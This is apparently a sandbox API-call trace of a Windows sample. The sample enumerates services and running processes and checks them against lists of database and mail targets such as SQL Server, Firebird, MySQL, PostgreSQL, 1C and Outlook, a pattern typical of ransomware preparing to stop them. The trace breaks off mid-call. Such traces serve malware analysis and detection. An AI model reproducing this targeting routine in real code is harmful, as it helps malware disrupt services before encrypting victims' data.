1 [0036.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0036.902] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0036.902] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0036.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0036.902] lstrlenW (lpString="AudioSrv") returned 8 [0036.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0036.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0036.902] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0036.902] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0036.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0036.902] lstrlenW (lpString="BFE") returned 3 [0036.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0036.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0036.902] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0036.903] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0036.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0036.903] lstrlenW (lpString="CryptSvc") returned 8 [0036.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0036.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0036.903] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0036.903] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0036.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0036.903] lstrlenW (lpString="CscService") returned 10 [0036.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0036.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0036.903] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0036.903] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0036.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0036.903] lstrlenW (lpString="DcomLaunch") returned 10 [0036.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0036.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0036.903] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0036.903] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0036.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0036.903] lstrlenW (lpString="Dhcp") returned 4 [0036.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0036.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0036.903] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0036.903] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0036.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0036.903] lstrlenW (lpString="Dnscache") returned 8 [0036.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0036.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0036.903] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0036.903] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0036.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0036.904] lstrlenW (lpString="DPS") returned 3 [0036.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0036.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0036.904] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0036.904] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0036.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0036.904] lstrlenW (lpString="eventlog") returned 8 [0036.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0036.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0036.904] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0036.904] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0036.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0036.904] lstrlenW (lpString="EventSystem") returned 11 [0036.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0036.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0036.904] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0036.904] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0036.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0036.904] lstrlenW (lpString="gpsvc") returned 5 [0036.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0036.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0036.904] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0036.904] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0036.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0036.904] lstrlenW (lpString="iphlpsvc") returned 8 [0036.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0036.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0036.904] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0036.904] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0036.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0036.904] lstrlenW (lpString="LanmanServer") returned 12 [0036.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0036.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0036.905] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0036.905] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0036.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0036.905] lstrlenW (lpString="LanmanWorkstation") returned 17 [0036.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0036.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0036.905] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0036.905] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0036.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0036.905] lstrlenW (lpString="lmhosts") returned 7 [0036.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0036.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0036.905] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0036.905] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0036.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0036.905] lstrlenW (lpString="MMCSS") returned 5 [0036.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0036.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0036.905] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0036.905] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0036.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0036.905] lstrlenW (lpString="MpsSvc") returned 6 [0036.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0036.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0036.905] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0036.905] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0036.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0036.905] lstrlenW (lpString="Netman") returned 6 [0036.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0036.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0036.905] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0036.905] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0036.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0036.906] lstrlenW (lpString="netprofm") returned 8 [0036.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0036.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0036.906] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0036.906] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0036.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0036.906] lstrlenW (lpString="NlaSvc") returned 6 [0036.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0036.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0036.906] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0036.906] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0036.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0036.906] lstrlenW (lpString="nsi") returned 3 [0036.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0036.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0036.906] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0036.906] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0036.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0036.906] lstrlenW (lpString="PcaSvc") returned 6 [0036.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0036.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0036.906] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0036.906] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0036.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0036.906] lstrlenW (lpString="PlugPlay") returned 8 [0036.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0036.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0036.906] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0036.906] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0036.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0036.906] lstrlenW (lpString="Power") returned 5 [0036.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0036.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0036.907] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0036.907] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0036.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0036.907] lstrlenW (lpString="ProfSvc") returned 7 [0036.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0036.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0036.907] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0036.907] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0036.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0036.907] lstrlenW (lpString="RpcEptMapper") returned 12 [0036.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0036.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0036.907] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0036.907] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0036.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0036.907] lstrlenW (lpString="RpcSs") returned 5 [0036.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0036.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0036.907] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0036.907] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0036.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0036.907] lstrlenW (lpString="SamSs") returned 5 [0036.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0036.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0036.907] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0036.907] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0036.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0036.907] lstrlenW (lpString="Schedule") returned 8 [0036.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0036.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0036.907] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0036.908] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0036.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0036.908] lstrlenW (lpString="SENS") returned 4 [0036.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0036.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0036.908] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0036.908] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0036.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0036.908] lstrlenW (lpString="ShellHWDetection") returned 16 [0036.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0036.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0036.908] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0036.908] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0036.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0036.908] lstrlenW (lpString="Spooler") returned 7 [0036.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0036.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0036.908] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0036.908] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0036.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0036.908] lstrlenW (lpString="SysMain") returned 7 [0036.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0036.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0036.908] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0036.908] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0036.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0036.908] lstrlenW (lpString="Themes") returned 6 [0036.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0036.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0036.908] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0036.908] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0036.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0036.909] lstrlenW (lpString="TrkWks") returned 6 [0036.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0036.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0036.909] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0036.909] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0036.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0036.909] lstrlenW (lpString="UxSms") returned 5 [0036.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0036.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0036.909] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0036.909] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0036.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0036.909] lstrlenW (lpString="VSS") returned 3 [0036.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0036.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0036.909] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0036.909] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0036.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0036.909] lstrlenW (lpString="WdiServiceHost") returned 14 [0036.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0036.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0036.909] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0036.909] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0036.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0036.910] lstrlenW (lpString="WdiSystemHost") returned 13 [0036.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0036.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0036.910] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0036.910] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0036.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0036.910] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0036.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0036.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0036.910] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0036.910] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0036.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0036.910] lstrlenW (lpString="Winmgmt") returned 7 [0036.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0036.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0036.910] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0036.910] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0036.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0036.910] lstrlenW (lpString="WPDBusEnum") returned 10 [0036.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0036.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0036.910] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0036.910] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0036.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0036.910] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6c4f10 | out: hHeap=0x5d0000) returned 1 [0036.910] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x174 [0036.915] Process32FirstW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0036.916] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0036.916] lstrlenW (lpString="System") returned 6 [0036.916] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0036.916] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0036.916] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0036.917] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0036.917] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0036.917] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0036.917] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0036.917] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0036.917] lstrlenW (lpString="smss.exe") returned 8 [0036.917] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0036.917] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0036.917] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0036.917] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0036.917] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0036.917] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0036.917] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0036.918] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0036.918] lstrlenW (lpString="csrss.exe") returned 9 [0036.918] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0036.918] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0036.918] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0036.918] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0036.918] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0036.918] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0036.918] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0036.918] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0036.919] lstrlenW (lpString="wininit.exe") returned 11 [0036.919] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0036.919] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0036.919] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0036.919] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0036.919] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0036.919] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0036.919] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0036.919] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0036.920] lstrlenW (lpString="csrss.exe") returned 9 [0036.920] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0036.920] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0036.921] lstrlenW (lpString="winlogon.exe") returned 12 [0036.921] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0036.921] lstrlenW (lpString="services.exe") returned 12 [0036.921] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0036.922] lstrlenW (lpString="lsass.exe") returned 9 [0036.922] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0036.923] lstrlenW (lpString="lsm.exe") returned 7 [0036.923] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.923] lstrlenW (lpString="svchost.exe") returned 11 [0036.923] Process32NextW (in: 